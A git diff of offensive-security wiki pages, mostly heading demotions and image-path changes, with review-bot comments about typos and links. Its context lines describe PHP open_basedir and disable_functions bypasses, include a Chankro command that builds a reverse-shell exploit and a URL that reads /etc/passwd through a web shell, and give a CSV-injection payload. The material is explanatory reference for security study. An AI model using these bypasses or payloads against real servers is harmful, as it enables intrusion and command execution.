||||
|
||||
# disable\_functions & open\_basedir
|
||||
## disable\_functions & open\_basedir
|
||||
|
||||
**Disabled functions** is the setting that can be configured in `.ini` files in PHP that will **forbid** the use of the indicated **functions**. **Open basedir** is the setting that indicates to PHP the folder that it can access.\
|
||||
The PHP setting sue to be configured in the path _/etc/php7/conf.d_ or similar.
|
||||
|
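Review bot: context typo next to the demoted heading: "The PHP setting sue to be configured in the path" should read "The PHP settings use to be configured in the path" (or "are usually configured in"); worth fixing while the heading is being re-levelled.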
@ -112,12 +111,12 @@ Both configuration can be seen in the output of **`phpinfo()`**:
|
|||
|
||||
![](<../../../../.gitbook/assets/image (347).png>)
|
||||
|
||||
# open\_basedir Bypass
|
||||
## open\_basedir Bypass
|
||||
|
||||
`open_basedir` will configure the folders that PHP can access, you **won't be able to to write/read/execute any file outside** those folders, but also you **won't even be able to list** other directories.\
|
||||
However, if somehow you are able to execute arbitrary PHP code you can **try** the following chunk of **codes** to try to **bypass** the restriction.
|
||||
|
||||
## Listing dirs with glob:// bypass
|
||||
### Listing dirs with glob:// bypass
|
||||
|
||||
In this first example the `glob://` protocol with some path bypass is used:
|
||||
|
||||
|
@ -142,7 +141,7 @@ foreach($file_list as $f){
|
|||
**Note2**: It looks like part of the code is duplicated, but that's actually necessary!\
|
||||
**Note3**: This example is only useful to list folders not to read files
|
||||
|
||||
## Full open\_basedir bypass abusing FastCGI
|
||||
### Full open\_basedir bypass abusing FastCGI
|
||||
|
||||
If you want to **learn more about PHP-FPM and FastCGI** you can read the [first section of this page](disable\_functions-bypass-php-fpm-fastcgi.md).\
|
||||
If **`php-fpm`** is configured you can abuse it to completely bypass **open\_basedir**:
|
||||
|
@ -514,24 +513,24 @@ Just access `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/p
|
|||
You may be thinking that just in the same way we have overwritten `open_basedir` configuration we can **overwrite `disable_functions`**. Well, try it, but it won't work, apparently **`disable_functions` can only be configured in a `.ini` php** configuration file and the changes you perform using PHP\_VALUE won't be effective on this specific setting.
|
||||
{% endhint %}
|
||||
|
||||
# disable\_functions Bypass
|
||||
## disable\_functions Bypass
|
||||
|
||||
If you manage have PHP code executing inside a machine you probably want to go to the next level and **execute arbitrary system commands**. In this situation is usual to discover that most or all the PHP **functions** that allow to **execute system commands have been disabled** in **`disable_functions`.**\
|
||||
So, lets see how you can bypass this restriction (if you can)
|
||||
|
||||
## Automatic bypass discovery
|
||||
### Automatic bypass discovery
|
||||
|
||||
You can use the tool [https://github.com/teambi0s/dfunc-bypasser](https://github.com/teambi0s/dfunc-bypasser) and it will indicate you which technique you can use to bypass `disable_functions`.
|
||||
|
||||
## Bypassing using other system functions
|
||||
### Bypassing using other system functions
|
||||
|
||||
Just return to the begging of this page and **check if any of the command executing functions isn't disabled and available in the environment**. If you find just 1 of them, you will be able to use it to execute arbitrary system commands.
|
||||
|
||||
## LD\_PRELOAD bypass
|
||||
### LD\_PRELOAD bypass
|
||||
|
||||
It's well known that some functions in PHP like `mail()`are going to **execute binaries inside the system**. Therefore, you can abuse them using the environment variable `LD_PRELOAD` to make them load an arbitrary library that can execute anything.
|
||||
|
||||
### Functions that can be used to bypass disable\_functions with LD\_PRELOAD
|
||||
#### Functions that can be used to bypass disable\_functions with LD\_PRELOAD
|
||||
|
||||
1. `mail`
|
||||
2. `mb_send_mail` : If your system has `php-mbstring` module installed then this function can be used to bypass php disable\_functions.
|
||||
|
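Review bot: context typos beside the demoted headings in this hunk: "If you manage have PHP code executing" (missing "to"), "So, lets see" ("let's"), and "return to the begging of this page" ("beginning"). Cheap to fix in the same change.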
@ -557,10 +556,10 @@ uid_t getuid(void){
|
|||
}
|
||||
```
|
||||
|
||||
### Bypass using Chankro
|
||||
#### Bypass using Chankro
|
||||
|
||||
In order to abuse this misconfiguration you can [**Chankro**](https://github.com/TarlogicSecurity/Chankro). This is a tool that will **generate a PHP exploit** that you need to upload to the vulnerable server and execute it (access it via web).\
|
||||
**Chankro** will write inside the victims disc the **library and the reverse shell** you want to execute and will use the**`LD_PRELOAD` trick + PHP `mail()`** function to execute the reverse shell.
|
||||
**Chankro** will write inside the victims disc the **library and the reverse shell** you want to execute and will use the\*\*`LD_PRELOAD` trick + PHP `mail()`\*\* function to execute the reverse shell.
|
||||
|
||||
Note that in order to use **Chankro**, `mail` and `putenv` **cannot appear inside the `disable_functions` list**.\
|
||||
In the following example you can see how to **create a chankro exploit** for **arch 64**, that will execute `whoami` and save the out in _/tmp/chankro\_shell.out_, chankro will **write the library and the payload** in _/tmp_ and the **final exploit** is going to be called **bicho.php** (that's the file you need to upload to the victims server):
@ -583,7 +582,7 @@ python2 chankro.py --arch 64 --input shell.sh --path /tmp --output bicho.php
If you find that **mail** function is blocked by disabled functions, you may still be able to use the function **mb\_send\_mail.**\
More information about this technique and Chankro here: [https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/](https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/)
## "Bypass" using PHP capabilities
### "Bypass" using PHP capabilities
Note that using **PHP** you can **read and write files, create directories and change permissions**.\
You can even **dump databases**.\
@ -591,10 +590,16 @@ Maybe using **PHP** to **enumerate** the box you can find a way to escalate priv
I have created a webshell that makes very easy to perform this actions (note that most webshells will offer you this options also): [https://github.com/carlospolop/phpwebshelllimited](https://github.com/carlospolop/phpwebshelllimited)
## Modules/Version dependent bypasses
### Modules/Version dependent bypasses
There are several ways to bypass disable\_functions if some specific module is being used or exploit some specific PHP version:
* [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md)
* [**Bypass with FFI - Foreign Function Interface enabled**](broken-reference)****
* [**Bypass via mem**](disable\_functions-bypass-via-mem.md)
* [**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md)
* [**PHP Perl Extension Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md)
* [**dl function**](disable\_functions-bypass-dl-function.md)****
* [**This exploit**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass)
* 5.\* - exploitable with minor changes to the PoC
* 7.0 - all versions to date
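Review bot: the new `Bypass with FFI - Foreign Function Interface enabled` item links to `broken-reference`, a placeholder that will not resolve, so it needs a real page target (or should be left out until that page exists); that item and the `dl function` item also end with a stray `****` after the closing parenthesis that should be removed. The intro line's `exploit some specific PHP version` would read better as `exploit a specific PHP version`.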
@ -604,28 +609,24 @@ There are several ways to bypass disable\_functions if some specific module is b
* 7.4 - all versions to date
* 8.0 - all versions to date
* [**From 7.0 to 8.0 exploit (Unix only)**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php)
* [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md)
* **dl function**
* [**PHP 7.0=7.4 (\*nix)**](disable\_functions-bypass-php-7.0-7.4-nix-only.md#php-7-0-7-4-nix-only)
* [**Imagick 3.3.0 PHP >= 5.4**](disable\_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md)
* [**PHP 5.x Shellsock**](disable\_functions-php-5.x-shellshock-exploit.md)
* [**PHP 5.2.4 ionCube**](disable\_functions-php-5.2.4-ioncube-extension-exploit.md)
* [**PHP <= 5.2.9 Windows**](disable\_functions-bypass-php-less-than-5.2.9-on-windows.md)
* [**PHP 5.2.4/5.2.5 cURL**](disable\_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md)
* [**PHP Perl Extension Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md)
* [**PHP 5.2.3 -Win32std**](disable\_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md)
* [**PHP 5.2 FOpen exploit**](disable\_functions-bypass-php-5.2-fopen-exploit.md)
* [**Bypass via mem**](disable\_functions-bypass-via-mem.md)
* [**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md)
* [**PHP 4 >= 4.2.-, PHP 5 pcntl\_exec**](disable\_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl\_exec.md)
## **ALL IN ONE**
### **Automatic Tool**
The code with more options mentioned here available I have found is [https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php](https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php)
The following script tries some of the methods commented here:\
[https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php](https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php)
# Other Interesting PHP functions
## Other Interesting PHP functions
## List of functions which accept callbacks
### List of functions which accept callbacks
These functions accept a string parameter which could be used to call a function of the attacker's choice. Depending on the function the attacker may or may not have the ability to pass a parameter. In that case an Information Disclosure function like phpinfo() could be used.\
Function => Position of callback arguments\
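Review bot: two entries kept in this list have typos worth fixing while it is being reordered: `PHP 5.x Shellsock` should be `Shellshock` (its target file is `disable_functions-php-5.x-shellshock-exploit.md`), and `PHP 4 >= 4.2.-` is missing its last digit (its target file is `disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md`, so `4.2.0`). The `**dl function**` entry is the only one in the list without a link; if that copy is the one that stays, point it at `disable_functions-bypass-dl-function.md` as the other dl-function entry on this page does.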
@ -662,7 +663,7 @@ Function => Position of callback arguments\
'sqlite\_create\_aggregate' => array(2, 3),\
'sqlite\_create\_function' => 2,
## Information Disclosure
### Information Disclosure
Most of these function calls are not sinks. But rather it maybe a vulnerability if any of the data returned is viewable to an attacker. If an attacker can see phpinfo() it is definitely a vulnerability.\
**phpinfo**\
@ -683,7 +684,7 @@ Most of these function calls are not sinks. But rather it maybe a vulnerability
**getmypid**\
**getmyuid**
## Other
### Other
**extract** - Opens the door for register\_globals attacks (see study in scarlet).\
**parse\_str** - works like extract if only one argument is given.\
@ -703,7 +704,7 @@ putenv\
**posix\_setsid**\
**posix\_setuid**
## Filesystem Functions
### Filesystem Functions
According to RATS all filesystem functions in php are nasty. Some of these don't seem very useful to the attacker. Others are more useful than you might think. For instance if allow\_url\_fopen=On then a url can be used as a file path, so a call to copy($\_GET\['s'], $\_GET\['d']); can be used to upload a PHP script anywhere on the system. Also if a site is vulnerable to a request send via GET everyone of those file system functions can be abused to channel and attack to another host through your server.
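Review bot: the unchanged paragraph below the demoted `### Filesystem Functions` heading contains two typos that alter its meaning and could be fixed in the same change: `a request send via GET everyone of those file system functions` should be `a request sent via GET, every one of those file system functions`, and `channel and attack to another host` should be `channel an attack to another host`.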
@ -802,7 +803,6 @@ According to RATS all filesystem functions in php are nasty. Some of these don't
**php\_strip\_whitespace**\
**get\_meta\_tags**
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -818,5 +818,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>
@ -219,7 +219,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
</methodCall>
```
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png>)
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (102).png>)
@ -41,7 +41,7 @@ Electron has 2 process types:
* Main Process (has complete access to NodeJS)
* Renderer Process (should have NodeJS restricted access for security reasons)
![](<../../../.gitbook/assets/image (307) (5).png>)
![](<../../../.gitbook/assets/image (307) (5) (1).png>)
A **renderer process** will be a browser window loading a file:
@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png" alt="" data-size="original">
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png" alt="" data-size="original">
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
@ -313,7 +313,7 @@ This helps to upload a file that complins with the format of several different f
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -59,7 +59,7 @@ The good news is that **this payload is executed automatically when the file is
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
### More
@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png" alt="" data-size="original">
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png" alt="" data-size="original">
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
@ -262,7 +262,7 @@ However, imagine a situation where the maximun length of the ID is 4 (0001-9999)
{% embed url="https://github.com/ticarpi/jwt_tool" %}
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -19,7 +19,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -239,7 +239,7 @@ intitle:"phpLDAPadmin" inurl:cmd.php
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -26,7 +26,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
## Attacks Graphic
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png>)
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (4).png>)
## Tool
@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -173,7 +173,7 @@ SELECT $TAG$hacktricks$TAG$;
```
{% hint style="danger" %}
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -285,7 +285,7 @@ HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
```
![](<../../.gitbook/assets/image (307).png>)
![](<../../.gitbook/assets/image (307) (5).png>)
## Powershell
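Review bot: this page now references `image (307) (5).png`, which is exactly the path the Electron hunk earlier in this commit stops using (that page moves to `image (307) (5) (1).png`), so one asset name is being handed from one page to an unrelated one; check that the file at `image (307) (5).png` after this commit is the RunOnce registry screenshot this section expects rather than the Electron process diagram, because a swapped picture renders without any build error.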